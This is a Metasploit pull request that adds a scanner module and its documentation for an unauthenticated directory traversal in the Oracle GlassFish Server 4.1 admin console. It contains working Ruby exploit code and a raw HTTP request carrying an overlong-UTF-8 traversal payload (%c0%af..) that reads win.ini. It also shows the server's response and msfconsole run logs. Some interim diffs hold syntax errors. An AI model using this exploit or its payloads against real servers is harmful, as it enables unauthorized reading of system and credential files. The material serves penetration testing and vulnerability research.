### PR TITLE
Path Traversal Oracle GlassFish

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/glassfish_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/glassfish_traversal.md
@@ -1,0 +1,116 @@
+## Vulnerable Application
+
+This module exploits an unauthenticated directory traversal vulnerability which exits in administration console of,
+Oracle GlassFish Server 4.1, which is listening by default on port 4848/TCP.
+
+Related links :
+
+* https://www.exploit-db.com/exploits/39441/
+
+## Verification
+
+```
+Start msfconsole
+use auxiliary/scanner/http/glassfish_traversal
+set RHOST
+set RHOSTS
+run
+```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/http/glassfish_traversal 
+msf auxiliary(scanner/http/glassfish_traversal) > set RHOST 192.168.1.103
+RHOST => 192.168.1.103
+msf auxiliary(scanner/http/glassfish_traversal) > set RHOSTS 192.168.1.103
+RHOSTS => 192.168.1.103
+msf auxiliary(scanner/http/glassfish_traversal) > run
+
+[+] ; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+[MCI Extensions.BAK]
+3g2=MPEGVideo
+3gp=MPEGVideo
+3gp2=MPEGVideo
+3gpp=MPEGVideo
+aac=MPEGVideo
+adt=MPEGVideo
+adts=MPEGVideo
+m2t=MPEGVideo
+m2ts=MPEGVideo
+m2v=MPEGVideo
+m4a=MPEGVideo
+m4v=MPEGVideo
+mod=MPEGVideo
+mov=MPEGVideo
+mp4=MPEGVideo
+mp4v=MPEGVideo
+mts=MPEGVideo
+ts=MPEGVideo
+tts=MPEGVideo
+
+[+] File saved at: /home/inputzero/.msf4/loot/20180731174317_default_192.168.1.103_oracle.glassfish_982307.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/glassfish_traversal) >
+```
+
+## HTTP Request
+
+```
+GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1
+Host: 192.168.1.105:8667
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+## HTTP Response
+
+```
+HTTP/1.1 200 OK
+Content-Length: 403
+Content-Type: text/plain
+Expires: Mon, 30 Jul 2018 11:16:55 GMT
+Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT
+Server: Microsoft-HTTPAPI/2.0
+Date: Sun, 29 Jul 2018 06:46:55 GMT
+Connection: close
+
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+[MCI Extensions.BAK]
+3g2=MPEGVideo
+3gp=MPEGVideo
+3gp2=MPEGVideo
+3gpp=MPEGVideo
+aac=MPEGVideo
+adt=MPEGVideo
+adts=MPEGVideo
+m2t=MPEGVideo
+m2ts=MPEGVideo
+m2v=MPEGVideo
+m4a=MPEGVideo
+m4v=MPEGVideo
+mod=MPEGVideo
+mov=MPEGVideo
+mp4=MPEGVideo
+mp4v=MPEGVideo
+mts=MPEGVideo
+ts=MPEGVideo
+tts=MPEGVideo
+```

--- a/documentation/modules/auxiliary/scanner/http/glassfish_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/glassfish_traversal.md
@@ -1,22 +1,21 @@
 ## Vulnerable Application
 
-This module exploits an unauthenticated directory traversal vulnerability which exits in administration console of,
+This module exploits an unauthenticated directory traversal vulnerability which exists in administration console of,
 Oracle GlassFish Server 4.1, which is listening by default on port 4848/TCP.
 
 Related links :
 
 * https://www.exploit-db.com/exploits/39441/
 * https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
+* http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip - Download Oracle Glass Fish 4.1
 
 ## Verification
 
-```
-Start msfconsole
-use auxiliary/scanner/http/glassfish_traversal
-set RHOSTS [IP]
-run
-```
-
+  1. Start msfconsole
+  2. Do: ```use auxiliary/scanner/http/glassfish_traversal```
+  3. Do: ```set RHOSTS [IP]```
+  4. Do: ```run```
+  
 ## Scenarios
 
 ```

--- a/documentation/modules/auxiliary/scanner/http/glassfish_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/glassfish_traversal.md
@@ -6,14 +6,14 @@ Oracle GlassFish Server 4.1, which is listening by default on port 4848/TCP.
 Related links :
 
 * https://www.exploit-db.com/exploits/39441/
+* https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
 
 ## Verification
 
 ```
 Start msfconsole
 use auxiliary/scanner/http/glassfish_traversal
-set RHOST
-set RHOSTS
+set RHOSTS [IP]
 run
 ```
 
@@ -21,13 +21,13 @@ run
 
 ```
 msf > use auxiliary/scanner/http/glassfish_traversal 
-msf auxiliary(scanner/http/glassfish_traversal) > set RHOST 192.168.1.103
-RHOST => 192.168.1.103
-msf auxiliary(scanner/http/glassfish_traversal) > set RHOSTS 192.168.1.103
-RHOSTS => 192.168.1.103
+msf auxiliary(scanner/http/glassfish_traversal) > set RHOSTS 192.168.1.105
+RHOSTS => 192.168.1.105
+msf auxiliary(scanner/http/glassfish_traversal) > set verbose true
+verbose => true
 msf auxiliary(scanner/http/glassfish_traversal) > run
 
-[+] ; for 16-bit app support
+[+] 192.168.1.105:4848 - ; for 16-bit app support
 [fonts]
 [extensions]
 [mci extensions]
@@ -55,7 +55,7 @@ mts=MPEGVideo
 ts=MPEGVideo
 tts=MPEGVideo
 
-[+] File saved at: /home/inputzero/.msf4/loot/20180731174317_default_192.168.1.103_oracle.glassfish_982307.txt
+[+] File saved in: /home/input0/.msf4/loot/20180804132151_default_192.168.1.105_oracle.traversal_244542.txt
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 msf auxiliary(scanner/http/glassfish_traversal) >
@@ -64,14 +64,16 @@ msf auxiliary(scanner/http/glassfish_traversal) >
 ## HTTP Request
 
 ```
-GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1
-Host: 192.168.1.105:8667
-User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
+GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1
+Host: 192.168.1.105:4848
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-Accept-Language: en-US,en;q=0.5
+Accept-Language: en-GB,en;q=0.5
 Accept-Encoding: gzip, deflate
+Cookie: JSESSIONID=3c54ae091ab200dc3ce8ecfff7c1
 Connection: close
 Upgrade-Insecure-Requests: 1
+If-Modified-Since: Sat, 04 Aug 2018 05:53:42 GMT
 ```
 
 ## HTTP Response

--- a/modules/auxiliary/scanner/http/glassfish_traversal.rb
+++ b/modules/auxiliary/scanner/http/glassfish_traversal.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'        => 'Path Traversal in Oracle GlassFish Server Open Source Edition',
       'Description' => %q{
         This module exploits an unauthenticated directory traversal vulnerability
-        which exits in administration console of Oracle GlassFish Server 4.1, which is 
+        which exits in administration console of Oracle GlassFish Server 4.1, which is
         listening by default on port 4848/TCP.
       },
       'References'  =>
@@ -26,8 +26,8 @@ class MetasploitModule < Msf::Auxiliary
           'Dhiraj Mishra' # Metasploit module
         ],
       'License'     => MSF_LICENSE
-	  'DisclosureDate' => "Aug 08 2015"
-    ))
+      'DisclosureDate' => "Aug 08 2015"
+	    ))
 
     register_options(
       [
@@ -35,9 +35,8 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('FILEPATH', [true, "The path to the file to read", '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini']),
         OptInt.new('DEPTH', [ true, 'Path Traversal Depth', 10 ])
       ])
-      
   end
-
+	
   def run_host(ip)
     filename = datastore['FILEPATH']
     traversal = "..%5d" * datastore['DEPTH'] << filename

--- a/modules/auxiliary/scanner/http/glassfish_traversal.rb
+++ b/modules/auxiliary/scanner/http/glassfish_traversal.rb
@@ -25,8 +25,8 @@ class MetasploitModule < Msf::Auxiliary
           'Trustwave SpiderLabs', # Vulnerability discovery
           'Dhiraj Mishra' # Metasploit module
         ],
+      'DisclosureDate' => 'Aug 08 2015',
       'License'     => MSF_LICENSE
-      'DisclosureDate' => "Aug 08 2015"
       ))
 
   register_options(

--- a/modules/auxiliary/scanner/http/glassfish_traversal.rb
+++ b/modules/auxiliary/scanner/http/glassfish_traversal.rb
@@ -27,17 +27,17 @@ class MetasploitModule < Msf::Auxiliary
         ],
       'License'     => MSF_LICENSE
       'DisclosureDate' => "Aug 08 2015"
-	    ))
+      ))
 
-    register_options(
+  register_options(
       [
         Opt::RPORT(4848),
         OptString.new('FILEPATH', [true, "The path to the file to read", '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini']),
         OptInt.new('DEPTH', [ true, 'Path Traversal Depth', 10 ])
       ])
   end
-	
-  def run_host(ip)
+
+    def run_host(ip)
     filename = datastore['FILEPATH']
     traversal = "..%5d" * datastore['DEPTH'] << filename
 

--- a/modules/auxiliary/scanner/http/glassfish_traversal.rb
+++ b/modules/auxiliary/scanner/http/glassfish_traversal.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
       'License'     => MSF_LICENSE
     ))
 
-register_options(
+  register_options(
       [
         Opt::RPORT(4848),
         OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
@@ -39,7 +39,7 @@ register_options(
       ])
   end
 
-    def run_host(ip)
+  def run_host(ip)
     filename = datastore['FILEPATH']
     traversal = "%c0%af.." * datastore['DEPTH'] << filename
 
@@ -51,7 +51,7 @@ register_options(
     unless res && res.code == 200
       print_error('Nothing was downloaded')
       return
-    end
+  end
 
     vprint_good("#{peer} - #{res.body}")
     path = store_loot(

--- a/modules/auxiliary/scanner/http/glassfish_traversal.rb
+++ b/modules/auxiliary/scanner/http/glassfish_traversal.rb
@@ -1,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Path Traversal in Oracle GlassFish Server Open Source Edition',
+      'Description' => %q{
+        This module exploits an unauthenticated directory traversal vulnerability
+        which exits in administration console of Oracle GlassFish Server 4.1, which is 
+        listening by default on port 4848/TCP.
+      },
+      'References'  =>
+        [
+          ['EDB', '39441']
+        ],
+      'Author'      =>
+        [
+          'Trustwave SpiderLabs', # Vulnerability discovery
+          'Dhiraj Mishra' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE
+	  'DisclosureDate' => "Aug 08 2015"
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(4848),
+        OptString.new('FILEPATH', [true, "The path to the file to read", '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini']),
+        OptInt.new('DEPTH', [ true, 'Path Traversal Depth', 10 ])
+      ])
+      
+  end
+
+  def run_host(ip)
+    filename = datastore['FILEPATH']
+    traversal = "..%5d" * datastore['DEPTH'] << filename
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => "/theme/META-INF/prototype#{traversal}"
+    })
+
+    if res && res.code == 200
+      print_good("#{res.body}")
+
+      path = store_loot(
+        'oracle.glassfish',
+        'text/plain',
+        ip,
+        res,
+        filename
+      )
+
+      print_good("File saved at: #{path}")
+    else
+      print_error("Nothing was downloaded")
+    end
+  end
+end

--- a/modules/auxiliary/scanner/http/glassfish_traversal.rb
+++ b/modules/auxiliary/scanner/http/glassfish_traversal.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
       'License'     => MSF_LICENSE
     ))
 
-  register_options(
+    register_options(
       [
         Opt::RPORT(4848),
         OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
     unless res && res.code == 200
       print_error('Nothing was downloaded')
       return
-  end
+    end
 
     vprint_good("#{peer} - #{res.body}")
     path = store_loot(


### PR DESCRIPTION
## Summary

This module exploits an unauthenticated directory traversal vulnerability which exits in administration console of, Oracle GlassFish Server 4.1, which is listening by default on port 4848/TCP.

## HTTP Request

```
GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1
Host: 192.168.1.105:4848
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=3c54ae091ab200dc3ce8ecfff7c1
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Sat, 04 Aug 2018 05:53:42 GMT
```

## HTTP Response

```
HTTP/1.1 200 OK
Server: GlassFish Server Open Source Edition  4.1 
X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition  4.1  Java/Oracle Corporation/1.8)
Last-Modified: Sat, 04 Aug 2018 05:53:42 GMT
Date: Sat, 04 Aug 2018 07:55:41 GMT
Connection: close
Content-Length: 403

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
```